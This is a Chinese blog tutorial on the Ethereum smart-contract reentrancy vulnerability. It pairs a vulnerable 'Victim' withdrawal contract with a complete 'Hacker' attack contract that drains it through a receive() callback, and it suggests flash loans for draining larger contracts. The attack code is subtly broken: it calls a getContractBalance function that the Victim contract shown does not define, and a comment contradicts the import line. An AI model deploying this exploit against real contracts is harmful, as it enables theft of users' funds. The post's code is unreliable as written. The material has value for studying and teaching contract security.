重入漏洞Victim

最新推荐文章于 2024-05-01 10:52:41 发布
最新推荐文章于 2024-05-01 10:52:41 发布
阅读量364 收藏
点赞数 1
文章标签: 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44217936/article/details/134012905
版权

重入漏洞

顾名思义,重入漏洞可以简单理解为“重新进入的漏洞”。举个简单的例子,你往某个合约里存入了1个Ether,然后点击退款,按理来说只能退一个Ether,但是可以利用重入漏洞反复退款,把合约里的Ether掏空。
以下,是一个有重入漏洞的合约,合约命名为Victim(受害者),主要实现几个功能:1)存款:用户往合约里存款,并给用户在合约里的账户记账(加);2)查询此合约的存款余额;3)取款:将用户之前存入的Ether转给用户并记账(减)。

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract Victim {
    mapping(address => uint256) public balance;

    function deposit() public payable {//存款函数
        balance[msg.sender] += msg.value;//存款后往用户账户上记账
    }

    function getBalance(address account) public view returns (uint256) {//查看余额函数
        return balance[account];//返回用户账上的记录
    }

    function withdraw() public {//取款函数
        uint256 currentBalance = balance[msg.sender];//获取用户当前在合约里的余额并赋值给currentBalance
        require(currentBalance > 0);//要求用户当前在合约的余额大于0

        (bool successful, ) = msg.sender.call{value: currentBalance}("");//调用call函数给用户退款(转Ether),如果成功就赋值successful为true
        require(successful, "Failed to withdraw Ether");//要求successful为true

        balance[msg.sender] = 0;//记账:将用户当前在合约里的余额清空
    }
}

问题出在这三行:

(bool successful, ) = msg.sender.call{value: currentBalance}("");//调用call函数给用户退款(转Ether),如果成功就赋值successful为true
require(successful, "Failed to withdraw Ether");//要求successful为true
balance[msg.sender] = 0;//记账:将用户当前在合约里的余额清空

第一行中,受害合约使用call给合约调用者转Ether,但是并不知道调用受害合约的是钱包地址(EOA)还是合约地址(contract)。如果调用受害合约的退款函数的是一个合约地址,那么可以做文章的地方就来了。

合约和钱包地址不太一样,并不是默认接收Ether的。一个合约要想接受别人发送的Ether,需要有receive函数或者fallback函数,也就是说,一个能接受Ether的合约在接收Ether的时候并非是被动接受,还会调用函数。

这一点我之前是没想通的,为什么给一个合约发送Ether还会调用对方的函数。如果是现实世界举例子,就像是你给一个公司的账户转账,会触发对方设定的一些条款(比如让你继续转账)。但是这就是Ethereum的特性。

如果我是攻击者,该怎么做?在我自己的合约的receive或者fallback函数里进行攻击。我在Goerli测试网部署的攻击合约如下,命名为Hacker(黑客):

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

//不方便引入,所以直接把Victim合约复制过来了
import "./victim.sol";

contract Hacker {
    address owner;
    Victim victim;
    constructor (address _victim) {
        owner = msg.sender;
        victim = Victim(_victim);
    }
    modifier onlyOwner {
        require(msg.sender == owner);
        _;
    }

    function getBalance() public view returns(uint256) {
        return address(this).balance;
    }

    receive() external payable {
        if (victim.getContractBalance() >= 1 ether) {//①决定了漏洞合约里最终剩多少钱,一般是下面的msg.value减去这里的数值
            victim.withdraw();
        }
    }

    function attack() public payable onlyOwner {
        require(msg.value >= 1 ether);
        victim.deposit{value:msg.value}();//②这里的msg.value不能超过上面①处的数值,否则循环的最后一次漏洞合约里的Ether不够,转账失败,整个攻击就失败了
        victim.withdraw();
    }

    function withdrawToHacker() public onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }
}

在重入的时候,每次退款的数额似乎会有不同的结果,我模拟的结果显示:往漏洞合约里转100E,然后分别使用1E/2E/4E/5E/10E(都能整除100)重入,只有10E成功,其他都报错了(可能和循环次数/堆栈有关?)。针对这种情况,如果目标合约里Ether较少,用自有资金攻击即可,但是如果目标合约的Ether较多,可能需要配合使用闪电贷。

想躺平的小陈
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bsidesto-victim:bsides-to talk 的受害者代码
07-12
与我的 bsidesTO talk 一起使用的代码示例
BB2:一个基于beebeeto的漏洞扫描器
07-03
BB2 一个基于beebeeto的漏洞扫描器 $ python bb2.py -h Usage: bb2.py [options] Options: -h, --help show this help message and exit -t TARGET, --target=TARGET the target to be checked. -f FILTER, --filter=FILTER filter CMS --update=COOKIE update poc ###示例 $ python bb2.py -t www.victim.com -f wordpress 不指定-f参数的话就使用所有poc ###更新 带cookie更新 $
Acquire-code:该项目旨在通过划分设备的内部硬盘驱动器,然后使用Xfinity Hot Spots插入代码使(现在的犯罪分子)成为“超级用户”,来识别和了解不断增加的被盗手机事件。 绝对可以访问内部和外部驱动器上的任何数据。 最终结果是“ VICTIM”,所有隐私,此特定的MalwareSpywareVirus还访问了“零号患者”联系人的讨厌的驱动器。 我在马萨诸塞州剑桥市的一个小型办公室工作。 我的办公室就在MIT和HARVARD之间。 在这1英里长的MASS AVE中。 它影响了最近从当前正
05-21
获取代码 该项目旨在通过划分设备的内部硬盘驱动器,然后使用Xfinity Hot Spots插入代码使(现在的犯罪分子)成为“超级用户”,来识别和了解不断增加的被盗手机事件。 绝对可以访问内部和外部驱动器上的任何数据。 最终结果是“ VICTIM”,所有隐私,此特定的恶意软件/间谍软件/病毒也访问了“零号患者”联系人的讨厌的驱动器。 我在马萨诸塞州剑桥市的一个小型办公室工作。 我的办公室就在MIT和HARVARD之间。 在这1英里长的MASS AVE中。 它会影响最近从当前正在使用Android平台的个人获取的用户信息的大约25-35%。
Predicting Offender Profiles From Offense and Victim Characteristics
02-24
The main aim of the research discussed in this chapter is to compare the characteristics of offenses and victims with those of offenders. Information was extracted from police files concerning 345 burglars and 310 violent offenders in Nottinghamshire, England. The most important observable features of offenders were sex, ethnicity, age, height, build, hair color, hair length, and facial hair. Combinations of these features were used to construct offender profiles. Offense features and victim features were compared with offender features. There were many significant regularities. Offense profiles based on location, site, time, and day were compared with offender profiles based on address, age, sex, and ethnicity. Address–age–sex victim profiles were compared with address–age–sex–ethnicity offender profiles. In addition, the extent to which offenders tended to repeat similar types of offenses and victims was studied. A computerized offender profiling system is recommended, based on criminological theories and empirical data about statistical regularities linking the characteristics of offenders, offenses, and victims.
bomblab实验报告.pdf
05-09
* Dr. Evil Incorporated (the PERPETRATOR) hereby grants you (the * VICTIM) explicit permission to use this bomb (the BOMB). This is a * time limited license, which expires on the death of the VICTIM. * The PERPETRATOR takes no responsibility for damage, frustration, * insanity, bug-eyes, carpal-tunnel syndrome, loss of sleep, or other * harm to the VICTIM. Unless the PERPETRATOR wants to take credit, * that is. The VICTIM may not distribute this bomb source code to * any enemies of the PERPETRATOR. No VICTIM may debug, * reverse-engineer, run "strings" on, decompile, decrypt, or use any * other technique to gain knowledge of and defuse the BOMB. BOMB * proof clothing may not be worn when handling this program. The * PERPETRATOR will not apologize for the PERPETRATOR's poor sense of * humor. This license is null and void where the BOMB is prohibited * by law.
零时科技|solidity智能合约基础漏洞——重入漏洞
m0_37598434的博客
02-25 3731
区块链领域的安全问题不容忽视,这就要求开发者必须时刻小心谨慎,养成防御性编程思维
重入漏洞的分析,复现以及修复方案
m0_68764244的博客
06-12 2464
在以太坊中,智能合约能够调用其他外部合约的代码,由于智能合约可以调用外部合约或者发送以太币,这些操作需要合约提交外部的调用,所以这些合约外部的调用就可以被攻击者利用造成攻击劫持,使得被攻击合约在任意位置重新执行,绕过原代码中的限制条件,从而发生重入攻击。重入攻击本质上与编程里的递归调用类似,所以当合约将以太币发送到未知地址时就可能会发生。简单的来说,发生重入攻击漏洞的条件有 2 个:调用了外部的合约且该合约是不安全的 外部合约的函数调用早于状态变量的修改假设:智能合约A有函数F1,攻击合约B有函数F2。F1
重入漏洞
kugool的专栏
03-15 1万+
安全性是我们编写智能合约时要考量的最重要的因素之一。在智能合约编程领域,错误总是很轻易而又很昂贵地在发生。与其他程序一样,智能合约程序当然也会严格按照其程序逻辑来执行,虽然结果并不总是像程序员们所设想的那样。此外,所有智能合约都是公开可见的,任何人都可以简单地构造一个交易来与它们进行交互。 重入 以太坊智能合约的特性之一就是能够调用和使用其他外部合约的代码。合约通常也会用来处理以太币,因而也会经常将以太币发送到不同的外部用户地址。这些处理都需要合约提交外部调用。这些外部调用有可能会被攻击者劫持,迫使.
深入理解重入攻击漏洞
SierraW的博客
07-06 2121
前言 智能合约(英文:Smart contract )的概念于 1995 年由 Nick Szabo 首次提出,它是一种旨在以信息化方式传播、验证或执行合同的计算机协议,它允许在没有第三方的情况下进行可信交易,这些交易可追踪且不可逆转。然而智能合约也并非是安全的,其中 重入 (Re-Entrance) 攻击漏洞是以太坊中的攻击方式之一,早在 2016 年就因为 The DAO 事件而造成了以太坊的硬分叉。 漏洞概述 在以太坊中,智能合约能够调用其他外部合约的代码,由于智能合约可以调用外部合约或者发送以太币,
The DAO的漏洞利用分析
李赫的专栏
09-04 7965
我相信大家都已经听说了关于DAO被盗高达$150M的头条新闻是由黑客使用递归以太坊发送漏洞利用。 这篇文章将会是第一个涉及这一系列可能是什么,提供通过区块链来对攻击者的行动进行时间轴上的追踪,解构和解释在技术层面上到底是什么出错了。第一篇的发布将会关注于攻击者具体是如何从DAO中偷走了所有的钱。 一个多级的攻击 DAO的这次漏洞利用显然不是微不足道的;具体的编程模式使得DAO的弱
重入函数与不可重入函数
嵌入式开发小站
09-04 1239
         主要用于多任务环境中,一个可重入的函数简单来说就是可以被中断的函数,也就是说,可以在这个函数执行的任何时刻中断它,转入OS调度下去执行另外一段代码,而返回控制时不会出现什么错误;而不可重入的函数由于使用了一些系统资源,比如全局变量区,中断向量表等,所以它如果被中断的话,可能会出现问题,这类函数是不能运行在多任务环境下的。也可以这样理解,重入即表示重复进入,首先它意味着这个函数
【公链安全】以太坊君士坦丁堡重入漏洞分析
Fly_鹏程万里
01-24 313
前言 在上周,以太坊准备进行君士坦丁堡硬分叉的前一日被披露出来了一则漏洞,该漏洞由新启动的EIP 1283引起,漏洞危害准确的说应该是一种可能会让一些合约存在重入漏洞的隐患,而不是一定会使合约产生重入漏洞。该漏洞在被发现之后以太坊基金会立马宣布了停止硬分叉,并商议择日再启动以太坊君士坦丁堡硬分叉。 EIP 1283 EIP的全称是Ethereum Improvement Proposals(...
以太坊智能合约安全漏洞 (1):重入攻击
henrynote的博客
08-27 8565
本文转自公众号:亨利笔记 首发于: https://hash1024.org/topics/27 本文的英文原文已有若干个中文翻译版本,但译文和原文都有错漏或不足。本文系基于译者(Henry)的理解,重新翻译并做了修正,并且加入了个人的注解和插图,力求让读者更容易领会原文的含义。为不影响阅读体验,注解没有单独标出, 可当译文 +“笔记”来阅读。感兴趣的读者可参考文末的原文地址。 虽然仍然处...
《我学区块链》—— 三十一、以太坊安全之 可重入漏洞
xuguangyuansh的博客
10-26 1095
三十一、以太坊安全之 可重入漏洞 如果一个函数在执行完成前被调用了数次,发生意料不到的行为时,可重入漏洞就可能出现。 我们看看下面这个函数,它可以用于从合约中提取调用者的总余额: mapping (address => uint) private balances; function payOut () { require(msg.sender.call.value(balances...
智能合约漏洞——重入漏洞
S123456215的博客
05-27 1176
​前提:一个消息调用的目标,可以再次进行智能合约创建或者信息调用。 重入:消息调用的目标智能合约函数中又调用了发起消息调用的智能合约的函数。 假设:智能合约A有函数F1,攻击合约B有函数F2。F1功能是向消息发送方转账,或者调用消息发送方的特定函数,B就有可能利用重入进行攻击。 受害者合约: contract EtherStore{ uint256 public withdrawaLimit = 1 ether; mapping(address => uint256) publi
ERC20漏洞被这位大哥扒透了 满篇代码废话少
xiliangMa的博客
08-06 2621
今天主要给大家介绍三个内容: 第一,智能合约是什么。这里“是什么”的意思,指在我的眼里它是什么,即我对智能合约的第一印象、第二印象等。 第二,智能合约有什么特别之处。这里特别之处,指的是它的运行规则,和它的特性。智能合约是代码,那么它的代码跟其他程序的代码有什么不一样的地方,这是我需要关注的。 第三,智能合约中可能出现的安全问题。我会用几个有代表性的,典型漏洞来举例。结合这些漏洞,我会谈谈自...
TheDAO悲剧重演,SpankChain重入漏洞分析
热门推荐
Fly_鹏程万里
10-16 2万+
前言 在10月8日,区块链项目方SpankChain在medium上发表了一篇文章, 并表明其受到了攻击,导致损失了160多个ETH和一些Token,这次攻击事件,相对来说损失金额是较小的,约4万美元,不过值得一提的是:这次攻击事件的起因与2016年闹得沸沸扬扬的TheDAO事件如出一辙!一共被盗走300多万ETH,更为严重的是还间接导致了以太坊硬分叉... 自那次事件起,以太坊的智能合约开发...
4月20日,杭州Sui Meetup活动回顾
最新发布
Sui_Network的博客
05-01 961
4 月 20 日在风景如画的杭州,「TinTin DESTINATION MOON」成功举办。此次活动深入探讨了 Sui 生态系统的演进及未来机遇,包括 Sui 上的资产管理协议 Mole、全链引擎 Obelisk Engine 以及 Generator 的开发范式等热点话题,行业专家提供了深刻见解和答案。
笃行致远,“易”往无前 | 易保全成立10周年啦
weixin_49292035的博客
04-28 354
10年间,我们聚焦四大区块链核心业务,在一次次技术创新与实践中,不断推进产品迭代升级,实现了与金融、物流运输、人力资源、电子政务、汽车、生产制造、医药医疗、图片摄影、律所等各行业的深度融合与应用。”为使命,坚信区块链的未来,夯实区块链底层技术,搭建“保全链”系统,首创“区块链+司法+应用”的模式,推出了四大区块链基础应用设施。10年后,易保全成为国内权威的电子数据存证保全机构,每一项成就背后都是“易”家人以步履铿锵之姿走过的每一步,当然也离不开广大用户、客户、伙伴的信赖与支持,才能让易保全行稳致远。
Victim Precipitation Theory
02-16
受害者自导理论(Victim Precipitation Theory)是一种犯罪学理论,旨在解释为什么某些人更有可能成为犯罪的受害者。该理论认为,受害者可能会通过自己的行为或言语,引发罪犯的攻击。这种行为可能是无意识的,也...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值